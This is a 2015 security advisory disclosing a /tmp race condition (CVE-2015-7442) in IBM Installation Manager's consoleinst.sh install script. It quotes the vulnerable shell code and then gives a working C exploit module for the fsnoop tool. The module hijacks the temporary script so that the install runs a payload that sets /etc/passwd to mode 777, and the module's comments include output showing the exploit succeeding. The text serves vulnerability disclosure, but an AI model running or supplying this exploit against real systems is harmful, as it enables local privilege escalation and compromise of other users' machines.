Advisory #: 156
Title: /tmp race condition in IBM Installation Manager v1.8.1 install script
Author: Larry W. Cashdollar, @_larry0
Date: 2015-10-29
CVE-ID:[CVE-2015-7442]
CWE: CWE-264 Permissions, Privileges, and Access Control
Download Site: http://www-03.ibm.com/software/products/en/appserv-wasfordev
Vendor: IBM
Vendor Notified: 2015-11-19
Vendor Contact: http://www-01.ibm.com/support/docview.wss?uid=swg21971295
Advisory: http://www.vapidlabs.com/advisory.php?v=156
Description: IBM Installation Manager is a command line utility to install various software packages developed by IBM. =====> IBM Installation Manager> Password required Credentials are required to connect to the IBM download site. Enter IBM ID and password. Select: P. Provide credentials and connect C. Cancel Select 'P' to enter credentials and connect, or 'C' to cancel. Forgot your IBM ID? https://www.ibm.com/account/profile?page=forgotuid Forgot your password? https://www.ibm.com/account/profile?page=forgot IBM ID help and FAQ https://www.ibm.com/account/profile/us/en?page=regfaqhelp -----> C
Vulnerability:
I noticed a /tmp race condition in IBM’s installation manager software install script The code in consoleinst.sh is: 46 TEMP=/tmp 47 tempScript=$TEMP/consoleinst-$$.sh 48 scriptLoc=`dirname "$0"` 49 slash=`expr "$scriptLoc" : "\(/\)"` 50 if [ "X$slash" != "X/" ]; then 51 scriptLoc=`pwd`/$scriptLoc 52 fi 53 54 if [ "$0" != "$tempScript" ]; then 55 cp "$0" "$tempScript" 56 cd "$TEMP" 57 origScriptLoc=$scriptLoc 58 export origScriptLoc 59 exec "$tempScript" $@ 60 # should not return from above exec 61 exit 1 62 fi If you guess the pid and create the file before the installer script does you can inject code to be executed at line 59. This is a log of me controlling permissions of the file during installation of the product: [M] -rwxrwxrwx 1 larry larry 34 Thu Oct 29 21:46:10 2015 /tmp/consoleinst-9999.sh [U] -rwxrwxrwx 1 larry larry 0 Thu Oct 29 21:46:34 2015 /tmp/consoleinst-10382.sh [U] -rwxrwxrwx 1 larry larry 2225 Thu Oct 29 21:46:34 2015 /tmp/consoleinst-10382.sh If I'm able to write to that file directly after it's modifed (inotify() for the win) I could inject commands into that installation script.
Export: JSON TEXT XML
Exploit Code:
  1. /*
  2. fsnoop v3.3 module for exploitation of: 
  3. http://www.vapidlabs.com/advisory.php?v=156
  4. special thanks to v14dz for getting this working, and Mudge @dotmudge for pointing me
  5. at his /tmp race condition tool l0pht-watch.
  6.  
  7. @v14dz
  8. http://vladz.devzero.fr/
  9.  
  10. $ make ibm-console.so
  11.  
  12. /tmp/x is :
  13.  
  14. #!/bin/sh
  15. chmod 777 /etc/passwd
  16.  
  17. $ ./fsnoop -p ibm-consoleinst.so 
  18. [+] ./ibm-consoleinst.so: ** IBM Console Install Exploit **
  19. [+] ./ibm-consoleinst.so: payload=[0xb77775fb] file=[/tmp/consoleinst-HEREPID.sh]
  20. [+] ./ibm-consoleinst.so: waiting for command: "/bin/sh ./consoleinst.sh"
  21. [+] ./ibm-consoleinst.so: Exploitation done.
  22. [+] ./ibm-consoleinst.so: Unloading module.
  23.  
  24. ls -l /etc/passwd
  25. -rwxrwxrwx 1 root root 1901 Nov 22  2014 /etc/passwd
  26.  
  27. */
  28.  
  29.  
  30.  
  31. #include <sys/types.h>
  32. #include <sys/stat.h>
  33. #include <fcntl.h>
  34.  
  35. char title[] = "** IBM Console Install Exploit **";
  36.  
  37. /* filters */
  38. char proc_name[] = "/bin/sh ./consoleinst.sh";
  39. char file[]      = "/tmp/consoleinst-HEREPID.sh";
  40.  
  41. /* Evil routines */
  42. void payload() { 
  43.   int fd;
  44. /*from v14dz: I use a fifo here, to unlock the paymod execution right after the cp command*/
  45.   mkfifo(file, 0666);
  46.   fd = open(file, O_RDONLY);
  47.   rename(file, "/tmp/a");
  48.   rename("/tmp/x", file);
  49. }
Screen Shots:
Notes: